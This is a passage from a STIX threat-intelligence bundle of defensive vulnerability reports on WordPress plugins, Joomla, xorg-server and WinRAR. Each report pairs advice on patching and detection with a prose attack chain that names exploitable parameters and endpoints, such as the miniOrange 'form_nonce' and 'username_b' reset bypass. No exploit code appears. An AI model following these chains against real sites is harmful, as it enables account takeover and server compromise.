      "published": "2026-07-09T00:28:02Z",
      "labels": [
        "sql-injection",
        "webserver",
        "vulnerability",
        "cve",
        "code-projects",
        "interview-management-system"
      ],
      "object_refs": [
        "indicator--8b7b13c9-c661-595c-8933-da25714f1dd6",
        "indicator--72c5bf15-c3b8-50b5-9660-e043a56244e7",
        "indicator--267c18f3-8bcf-57d6-bdaf-86a9d5fb62e6",
        "indicator--368f0310-8da9-5d50-b211-3f523fd84eca",
        "indicator--f583ca44-cf16-5795-8083-6a92646e833c",
        "indicator--779df5af-7864-5453-9ca9-a87a4cce5e02",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15137"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/susususua-AI/CVE/issues/2"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-15137"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/851066"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376952"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376952/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a85f868c-8b30-51f5-87d4-4e7240627b10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--547cd5d8-715f-561e-aa88-9e42c5ac85ea",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd64f57e-4781-5ee2-9a43-5c5b500a4c9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--547cd5d8-715f-561e-aa88-9e42c5ac85ea",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--547cd5d8-715f-561e-aa88-9e42c5ac85ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Divi Form Builder Missing Authorization Vulnerability (CVE-2026-5523) Leads to Account Takeover",
      "description": "## Overview\n\nThe Divi Form Builder plugin for WordPress, in versions up to and including 5.1.8, contains a critical Missing Authorization vulnerability, tracked as CVE-2026-5523. This flaw stems from the `update_user()` and `handle_register_submission()` functions, which fail to adequately verify user permissions when processing form submissions. Specifically, `update_user()` accepts a user ID parameter without confirming the authenticated user's authority to modify that account, while `handle_register_submission()` merely checks for any logged-in user instead of validating specific target user permissions. This allows authenticated attackers with even subscriber-level access to manipulate user accounts. Exploitation can lead to changing the email address and password of any user, including administrators, culminating in complete account takeover. This vulnerability is significant for WordPress site defenders using the affected plugin.\n\n## Attack Chain\n\n1. An authenticated attacker, possessing subscriber-level credentials, logs into the vulnerable WordPress site running the Divi Form Builder plugin.\n2. The attacker crafts a malicious HTTP POST request targeting a Divi Form Builder endpoint that leverages the `update_user()` or `handle_register_submission()` functions.\n3. Within the crafted request, the attacker includes a user ID parameter corresponding to a target user (e.g., an administrator account) and new values for the `user_email` and `user_pass` fields.\n4. The Divi Form Builder plugin, specifically versions up to 5.1.8, processes this request without performing sufficient authorization checks on the supplied user ID.\n5. Due to the missing authorization, the plugin proceeds to update the email address and password of the targeted user account in the WordPress database.\n6. The attacker then uses the newly set credentials to successfully log in to the compromised account, achieving full account takeover.\n7. If an administrator account was targeted, the attacker now possesses complete administrative control over the WordPress site.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-5523 grants authenticated attackers, even those with low-privilege subscriber accounts, the ability to take over any user account on the affected WordPress site. This includes administrator accounts, leading to a complete compromise of the website. An attacker with administrative control can deface the site, inject malicious code, steal sensitive data, install backdoors, or use the site for further attacks. The CVSS v3.1 Base Score for this vulnerability is 8.8, indicating high severity and potential for widespread damage.\n\n## Recommendation\n\n* Immediately patch CVE-2026-5523 by updating the Divi Form Builder plugin for WordPress to version 5.1.9 or higher.\n* Review all user accounts for any unauthorized changes to email addresses or passwords since the plugin was installed.\n* Implement strong password policies and multi-factor authentication (MFA) for all WordPress user accounts, especially administrators.\n* Consider deploying a Web Application Firewall (WAF) to potentially filter requests attempting to exploit known vulnerabilities like CVE-2026-5523.\n",
      "published": "2026-07-09T06:17:43Z",
      "labels": [
        "wordpress",
        "plugin",
        "vulnerability",
        "web-application",
        "account-takeover",
        "missing-authorization"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5523"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05798c4e-7366-53d2-817a-c92df04494e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8f97bb2-f814-5668-b5ca-a030ffe310ba",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b8f97bb2-f814-5668-b5ca-a030ffe310ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla: Multiple Vulnerabilities Allowing XSS and Data Modification",
      "description": "## Overview\n\nA German CERT-Bund advisory details multiple critical vulnerabilities impacting the widely used Joomla Content Management System (CMS). These flaws can be exploited by a remote attacker, potentially without authentication, to perform Cross-Site Scripting (XSS) attacks, modify existing data, or display false information. The vulnerabilities introduce significant integrity risks, allowing attackers to deface websites, inject malicious client-side scripts, or alter legitimate content. Given Joomla's extensive user base globally, successful exploitation could lead to widespread website compromises, data manipulation, and further client-side attacks against visitors. Organizations managing Joomla installations must apply patches promptly to prevent exploitation and mitigate these severe risks, which could lead to reputation damage and compliance issues.\n\n## Attack Chain\n\nThis advisory describes potential vulnerabilities and their impact rather than a specific, observed attack chain with concrete technical steps. Therefore, a detailed attack chain cannot be provided from the source material.\n\n## Impact\n\nThe exploitation of these Joomla vulnerabilities could lead to severe consequences for affected organizations. Successful Cross-Site Scripting attacks can result in session hijacking, credential theft, and further client-side exploitation of website visitors. The ability to modify data or display false information directly compromises the integrity and trustworthiness of the affected website, potentially leading to defacement, misinformation dissemination, and reputational damage for the organization. For e-commerce sites or those handling sensitive user data, unauthorized data modification could have legal and financial repercussions, including data breaches, customer trust erosion, and regulatory penalties. The impact is primarily on the integrity and availability of the web service and its data.\n\n## Recommendation\n\n* Monitor webserver logs for unusual HTTP requests indicative of Cross-Site Scripting (XSS) payload delivery or attempts to manipulate web content via atypical parameters.\n* Ensure Joomla installations are updated immediately with the latest security patches available from the vendor, as referenced in the BSI advisory, to mitigate these vulnerabilities.\n",
      "published": "2026-07-09T07:17:44Z",
      "labels": [
        "joomla",
        "cms",
        "vulnerability",
        "xss",
        "web-vulnerability",
        "data-integrity"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1891"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--872a0829-e46e-5355-acf0-cc4ebc0bf8c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-55999 xorg-server / xwayland glamor font atlas Heap Buffer Overflow",
      "description": "## Overview\n\nCVE-2026-55999 describes a critical heap buffer overflow vulnerability found within the `glamor font atlas` functionality of `xorg-server` and `xwayland` components. This flaw, disclosed by Microsoft Security Response Center, impacts Linux systems relying on these display server technologies. A heap buffer overflow occurs when a program writes data past the end of an allocated buffer on the heap, potentially overwriting adjacent memory. Successful exploitation could allow an attacker to achieve arbitrary code execution in the context of the display server, leading to a full system compromise if the server runs with elevated privileges, or cause a denial of service. The vulnerability underscores the importance of patching core system components, even those related to graphical display, as they can represent a significant attack surface. There are no indications of active exploitation in the wild, but the nature of the vulnerability makes it a high-risk target.\n\n## Attack Chain\n\n1. **Initial Access**: An attacker gains access to a user session on a vulnerable Linux system, either locally or through a misconfigured remote X server.\n2. **Malicious Input Crafting**: The attacker crafts specialized input, such as malformed font data or specific rendering commands, designed to trigger the buffer overflow within the `glamor font atlas` component.\n3. **Vulnerability Trigger**: The `xorg-server` or `xwayland` process attempts to parse or render the malicious input, causing the vulnerable code within the `glamor font atlas` to write beyond the bounds of an allocated memory buffer on the heap.\n4. **Memory Corruption**: The heap buffer overflow overwrites critical data structures, function pointers, or other adjacent memory regions within the display server's process memory space.\n5. **Control Flow Hijack**: Through careful manipulation of the overwritten memory, the attacker successfully redirects the program's execution flow to attacker-controlled shellcode or other malicious instructions.\n6. **Arbitrary Code Execution**: The attacker's code is executed within the context and with the privileges of the compromised `xorg-server` or `xwayland` process.\n7. **Impact \u0026 Escalation**: If the display server runs with root privileges (common for `xorg-server`), the attacker achieves full system-level compromise. Otherwise, the attacker gains control over the user's session, potentially exfiltrating data, installing malware, or escalating privileges further.\n\n## Impact\n\nA successful exploitation of CVE-2026-55999 could lead to severe consequences for affected Linux systems. The primary impacts include arbitrary code execution, which could grant an attacker full control over the compromised system, especially if the `xorg-server` or `xwayland` process runs with elevated privileges. Alternatively, exploitation could result in a denial of service, causing the display server to crash, rendering the graphical user interface unusable, and potentially impacting critical system operations. While specific victim counts or targeted sectors are not yet available, any organization utilizing Linux distributions with vulnerable versions of `xorg-server` or `xwayland` is at risk, particularly those with critical data or services accessible via graphical sessions.\n\n## Recommendation\n\n* Prioritize patching CVE-2026-55999 on all affected Linux systems immediately to mitigate the risk of heap buffer overflow exploitation.\n* Monitor process creation and network connections originating from `xorg-server` and `xwayland` processes for any anomalous behavior indicative of compromise, as described in the Attack Chain.\n* Ensure that `xorg-server` and `xwayland` run with the lowest necessary privileges to limit the impact of potential arbitrary code execution.\n",
      "published": "2026-07-09T07:48:31Z",
      "labels": [
        "cve",
        "vulnerability",
        "heap-overflow",
        "linux",
        "xorg",
        "xwayland"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55999"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aa1ed4c9-4b20-5d2a-bb0b-597f3a584beb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14191 WinRAR / UnRAR RAR5 recovery-volume (.rev) out-of-bounds heap write in RecVolumes5::ReadHeader",
      "description": "## Overview\n\nThis brief details CVE-2026-14191, an out-of-bounds heap write vulnerability affecting the widely used WinRAR and UnRAR archiving utilities. Identified and published by the Microsoft Security Response Center, this flaw exists within the `RecVolumes5::ReadHeader` function, which is responsible for processing RAR5 recovery volumes, specifically files with the `.rev` extension. An attacker could exploit this vulnerability by convincing a target user to open a malicious archive containing a specially crafted recovery volume. Successful exploitation typically leads to arbitrary code execution on the victim's system, granting the attacker control over the compromised machine. Given WinRAR's pervasive presence across various systems, this vulnerability represents a significant risk for individuals and organizations.\n\n## Attack Chain\n\n1. An attacker crafts a malicious RAR5 archive containing a specially formed recovery volume (`.rev`) designed to trigger an out-of-bounds heap write.\n2. The attacker distributes this malicious archive, often via phishing emails, malicious websites, or direct download links, to a target user.\n3. The unsuspecting user downloads and attempts to open or extract the contents of the malicious archive using a vulnerable version of WinRAR or UnRAR.\n4. During the archive processing, specifically when the application attempts to read the recovery volume header, the vulnerability in the `RecVolumes5::ReadHeader` function is triggered.\n5. The out-of-bounds heap write corrupts memory, leading to a state that allows the attacker to execute arbitrary code on the user's system.\n6. The attacker's injected code then executes, potentially establishing persistence mechanisms, downloading additional malware (such as ransomware or info-stealers), or initiating data exfiltration from the compromised host.\n\n## Impact\n\nA successful exploitation of CVE-2026-14191 would allow an attacker to execute arbitrary code on the victim's system with the privileges of the user running the WinRAR or UnRAR application. This could lead to a complete compromise of the affected system, resulting in data theft, encryption by ransomware, installation of backdoors for persistent access, or further lateral movement within an organization's network. Given the broad adoption of WinRAR in various sectors, this vulnerability poses a significant threat, as it can bypass traditional perimeter defenses by exploiting user interaction with a seemingly legitimate file type.\n\n## Recommendation\n\n* Immediately apply security updates for WinRAR and UnRAR as they become available from RARLAB to patch CVE-2026-14191.\n* Educate users on the risks associated with opening unsolicited or suspicious archive files, particularly those received from unknown sources or unexpected senders.\n* Implement robust email and web filtering solutions to block known malicious attachments and prevent access to websites that may host exploit kits or distribute weaponized archives.\n",
      "published": "2026-07-09T07:49:19Z",
      "labels": [
        "cve",
        "vulnerability",
        "archive",
        "client-side",
        "windows"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-14191"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f58fac33-7629-517a-8d40-200bd0ca43b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f56aabb-71f5-5dce-bd33-a10eb155230d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dda67a20-fcb3-51d7-835e-efa816963e97",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f56aabb-71f5-5dce-bd33-a10eb155230d",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9f56aabb-71f5-5dce-bd33-a10eb155230d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14245 - miniOrange OTP WordPress Plugin Authentication Bypass",
      "description": "## Overview\n\nThe miniOrange OTP Login, Verification and SMS Notifications plugin for WordPress versions up to and including 5.5.1 is vulnerable to an authentication bypass, identified as CVE-2026-14245. This flaw stems from the `um_reset_password_process_hook()` function's failure to perform server-side verification that the One-Time Password (OTP) validation step was completed. The plugin also emits a public `form_nonce` via a JavaScript object on the Ultimate Member password reset page, which attackers can leverage. By combining this nonce with an attacker-controlled `username_b` parameter, an unauthenticated actor can target any WordPress user, including Administrators, and obtain a password-reset URL for their account. This critical vulnerability allows for full account takeover and enables unauthorized administrative control over the affected WordPress instance. Exploitation requires the Ultimate Member Password Reset Form integration to be active and the miniOrange plugin not configured for phone-only reset.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site running the vulnerable miniOrange OTP Login, Verification and SMS Notifications plugin (versions \u003c= 5.5.1) with the Ultimate Member Password Reset Form integration active.\n2. The attacker navigates to the Ultimate Member password reset page, where the plugin publicly emits a `form_nonce` via the `moumprvar` JavaScript object. The attacker extracts this nonce value.\n3. The attacker crafts a malicious HTTP request (likely a POST request) to the server-side password reset handler (e.g., associated with the `um_reset_password_process_hook()` function).\n4. This request includes the extracted `form_nonce` and an attacker-chosen `username_b` parameter, targeting an existing Administrator account on the WordPress site.\n5. Due to the vulnerability, the server processes the request without validating whether the OTP verification step was successfully completed for the targeted user.\n6. The server responds with an HTTP 302 redirect, providing a freshly generated password-reset URL in the `Location` header for the specified Administrator account.\n7. The attacker uses this URL to set a new password for the Administrator account, thereby gaining full administrative control over the WordPress site.\n\n## Impact\n\nThe impact of CVE-2026-14245 is severe, as it allows any unauthenticated attacker to gain full administrative control over a vulnerable WordPress site. This can lead to complete compromise of the website, including data exfiltration, website defacement, injection of malicious content, establishment of persistent backdoors, and use of the site for further attacks (e.g., phishing or malware distribution). The vulnerability, with a CVSS v3.1 Base Score of 9.8 (Critical), signifies a high likelihood of successful exploitation with devastating consequences for the affected organization, impacting website integrity, data confidentiality, and availability.\n\n## Recommendation\n\n* Immediately update the miniOrange OTP Login, Verification and SMS Notifications plugin to a patched version beyond 5.5.1 to address CVE-2026-14245.\n* Review the configuration of the miniOrange OTP plugin to ensure it is not configured for phone-only reset if other reset methods are intended to be secured.\n* Audit WordPress user accounts, especially Administrator accounts, for any unauthorized password changes or suspicious activity that may indicate prior exploitation of CVE-2026-14245.\n",
      "published": "2026-07-09T08:22:33Z",
      "labels": [
        "wordpress",
        "plugin",
        "authentication-bypass",
        "web",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14245"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3adf3459-9ab6-5182-8348-685f28514f73",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6220a33f-c4b0-5408-9fd7-25de28e4fd9c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0b0f666-6788-5694-b1ec-fd6813aa17be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6220a33f-c4b0-5408-9fd7-25de28e4fd9c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6220a33f-c4b0-5408-9fd7-25de28e4fd9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-15000: WordPress Plugin Stored XSS",
      "description": "## Overview\n\nThe Connect Contact Form 7 and Mailchimp plugin for WordPress, specifically versions up to and including 0.9.78.06, is affected by CVE-2026-15000, a critical Stored Cross-Site Scripting (XSS) vulnerability. This flaw stems from insufficient input sanitization and output escaping of Mailchimp Merge Field Values. Unauthenticated attackers can exploit this by injecting arbitrary web scripts into form submissions. These scripts are then stored in the database. The unique aspect of this vulnerability is its deferred execution; the malicious payload only triggers when a privileged user, typically an Administrator, performs a 'Contact Lookup' for the email address submitted via the affected Contact Form 7. This means the attacker’s script executes within the administrator's browser, posing a significant risk for administrative session compromise, website defacement, or further compromise of the WordPress installation. Defenders must prioritize patching to mitigate this unauthenticated remote code execution vector.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site running the vulnerable \"Connect Contact Form 7 and Mailchimp\" plugin (versions \u003c= 0.9.78.06).\n2. The attacker crafts a malicious web script payload, encoding it for submission within a Mailchimp Merge Field Value.\n3. The attacker submits a Contact Form 7 form on the target WordPress site, embedding the malicious script into one of the Mailchimp Merge Field Values.\n4. Due to insufficient input sanitization and output escaping, the plugin stores the crafted malicious script directly into the site's database.\n5. A privileged user (e.g., an Administrator) accesses the WordPress administration panel and performs a \"Contact Lookup\" for the email address associated with the attacker's submission.\n6. When the administrator's browser loads the page displaying the details of the affected contact entry, the stored malicious script is retrieved from the database and executed within the administrator's browser context.\n7. The attacker's script executes with the administrator's privileges, potentially allowing session hijacking, credential theft, or further compromise of the WordPress site.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-15000 allows unauthenticated attackers to inject arbitrary web scripts that execute in a privileged user's browser. This can lead to complete compromise of the affected WordPress site, including administrative access, data manipulation, defacement, or redirection of visitors to malicious sites. While no specific victim counts are provided, all WordPress installations utilizing the vulnerable plugin versions are at risk, with the primary impact being on website integrity and visitor trust.\n\n## Recommendation\n\n* Patch CVE-2026-15000 by updating the Connect Contact Form 7 and Mailchimp plugin to a patched version greater than 0.9.78.06 immediately.\n* Deploy the Sigma rule 'Detect Stored XSS via WordPress Plugin Mailchimp Form Submission (CVE-2026-15000)' to your SIEM and tune it for your environment to identify suspicious POST requests containing XSS payloads.\n* Regularly review web server access logs for unusual patterns in form submissions, particularly POST requests to WordPress endpoints, looking for attempts to inject script tags or HTML entities.\n",
      "published": "2026-07-09T08:23:38Z",
      "labels": [
        "wordpress",
        "plugin",
        "xss",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15000"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dff3a463-b216-5510-a6a1-3f63bbc68b48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--939d622b-68b6-5137-9b01-760717e261b4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24b5e308-08d5-5469-8aaf-42c1038d595e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--939d622b-68b6-5137-9b01-760717e261b4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--939d622b-68b6-5137-9b01-760717e261b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-8848: Popup Maker WordPress Plugin Authorization Bypass Leading to RCE",
      "description": "## Overview\n\nA critical authorization bypass vulnerability, identified as CVE-2026-8848, has been discovered in all versions up to and including 1.22.0 of the \"Popup Maker - Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popup Builder\" plugin for WordPress. This flaw enables authenticated attackers possessing editor-level access or higher to circumvent proper authorization checks. The vulnerability allows these attackers to install and activate any arbitrary plugin from an attacker-controlled URL, ultimately leading to remote code execution (RCE) on the compromised WordPress instance. Successful exploitation hinges on two specific pre-conditions: an active Popup Maker Pro license must be present on the target site, and the Popup Maker Pro version must not yet be installed. These conditions are crucial as they allow a legacy `v1/connect/info` endpoint to issue a bearer token, which in turn satisfies a validation check required by the plugin's install endpoint.\n\n## Attack Chain\n\n1. **Initial Access**: An authenticated attacker, possessing editor-level or higher privileges, gains access to the WordPress administration interface of a site running the vulnerable Popup Maker plugin (version 1.22.0 or earlier).\n2. **Pre-Condition Fulfillment**: The attacker confirms that the target WordPress site has an active Popup Maker Pro license and that the Popup Maker Pro version of the plugin is not currently installed.\n3. **Bearer Token Acquisition**: The attacker sends a crafted request to the plugin's legacy `v1/connect/info` endpoint (e.g., `/wp-content/plugins/popup-maker/v1/connect/info`). Under the specific conditions met in the previous step, this endpoint improperly issues a valid bearer token.\n4. **Authorization Bypass**: The attacker utilizes the acquired bearer token to bypass the authorization and validation checks on a Popup Maker plugin installation endpoint, which would normally prevent editor-level users from installing plugins.\n5. **Malicious Plugin Provisioning**: The attacker specifies a URL pointing to a malicious WordPress plugin hosted on an attacker-controlled server.\n6. **Arbitrary Plugin Installation and Activation**: The vulnerable Popup Maker functionality processes the request, downloads, installs, and activates the arbitrary malicious plugin from the attacker-provided URL.\n7. **Impact**: Upon activation, the malicious plugin executes code with the privileges of the web server, resulting in remote code execution (RCE) on the underlying operating system of the WordPress host.\n\n## Impact\n\nThe successful exploitation of CVE-2026-8848 allows an attacker to achieve remote code execution on the WordPress host server. This can lead to complete compromise of the website and server, including defacement, data theft, insertion of backdoors, further lateral movement within the network, and establishment of persistent access. While requiring editor-level authentication, the ability to escalate privileges to RCE poses a severe risk to the integrity and confidentiality of the affected systems and data.\n\n## Recommendation\n\n* Immediately update the \"Popup Maker - Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popup Builder\" plugin to version 1.22.1 or higher to patch CVE-2026-8848.\n* Deploy the provided Sigma rule to detect anomalous access patterns to the legacy `v1/connect/info` endpoint, which is a key step in the exploitation chain for CVE-2026-8848.\n* Ensure `webserver` access logs are enabled and configured to capture full URI paths (`cs-uri-stem` and `cs-uri-query`) and HTTP methods for improved visibility.\n",
      "published": "2026-07-09T08:24:53Z",
      "labels": [
        "wordpress",
        "web-exploitation",
        "vulnerability",
        "rce",
        "authorization-bypass"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8848"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3391fbc0-7c3c-5f89-8946-dda12f43332a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--737c1de6-ce37-5400-82ec-625b339ae262",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
